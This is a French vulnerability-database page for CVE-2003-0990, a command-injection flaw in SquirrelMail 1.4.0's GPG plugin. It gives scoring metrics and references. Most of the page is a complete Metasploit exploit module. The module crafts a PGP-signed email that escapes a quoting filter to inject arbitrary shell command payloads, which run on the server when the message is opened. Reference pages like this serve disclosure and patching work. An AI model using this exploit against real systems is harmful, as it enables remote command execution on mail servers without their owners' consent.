CVE-2003-0990 : Détail

CVE-2003-0990

65.31%V3
Network
2004-01-06
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The parseAddress code in (1) SquirrelMail 1.4.0 and (2) GPG Plugin 1.1 allows remote attackers to execute commands via shell metacharacters in the "To:" field.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16888

Date de publication : 2010-08-24 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: squirrelmail_pgp_plugin.rb 10148 2010-08-25 20:31:46Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'SquirrelMail PGP Plugin command execution (SMTP)', 'Description' => %q{ This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at http://www.wslabi.com/. Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. Only "cmd/unix/generic" payloads were tested. }, 'License' => MSF_LICENSE, 'Version' => '$Revision: 10148 $', 'Author' => [ 'Nicob <nicob[at]nicob.net>' ], 'References' => [ ['CVE', '2003-0990'], ['OSVDB', '3178'], ['URL', 'http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html'], ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330'], ['URL', 'http://www.wslabi.com/wabisabilabi/initPublishedBid.do?'], ], 'Stance' => Msf::Exploit::Stance::Passive, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Targets' => [ [ 'SquirrelMail PGP plugin < 2.1', {} ], ], 'DisclosureDate' => 'Jul 9 2007', 'DefaultTarget' => 0)) end def mime_defaults() self.header.set("MIME-Version", "1.0") self.header.set("Content-Type", "multipart/signed; boundary=\"#{self.bound}\"; protocol=\"application/pgp-signature\"; micalg=pgp-sha1") self.header.set("Subject", '') # placeholder self.header.set("Date", Time.now.strftime("%a,%e %b %Y %H:%M:%S %z")) self.header.set("Message-ID", "<"+ Rex::Text.rand_text_alphanumeric(rand(20)+40)+ "@"+ Rex::Text.rand_text_alpha(rand(20)+3)+ ">" ) self.header.set("From", '') # placeholder self.header.set("To", '') # placeholder end def exploit body = # Display some junk rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + # Scroll down "\n" * (rand(100)+35) + # Escape filter and insert payload "AAAA\\\";" + payload.encoded + ";echo \\\"BBBBB\n" sig = "-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG\n\n " + rand_text_alphanumeric(rand(20)+54) + "\n" + rand_text_alphanumeric(rand(20)+34) + "\n" + "-----END PGP SIGNATURE-----\n" msg = Rex::MIME::Message.new msg.extend(MessageExtend) msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] msg.add_part(body, "text/plain;charset=us-ascii;format=flowed", "quoted-printable", nil) msg.add_part(sig, "application/pgp-signature", nil, "attachment; filename=signature.asc") send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end end

Products Mentioned

Configuraton 0

Squirrelmail>>Gpg_plugin >> Version 1.1

    Squirrelmail>>Squirrelmail >> Version 1.4.0

    Références

    http://marc.info/?l=bugtraq&m=107247236124180&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://www.securityfocus.com/bid/9296
    Tags : vdb-entry, x_refsource_BID
    http://www.securityfocus.com/archive/1/348366
    Tags : mailing-list, x_refsource_BUGTRAQ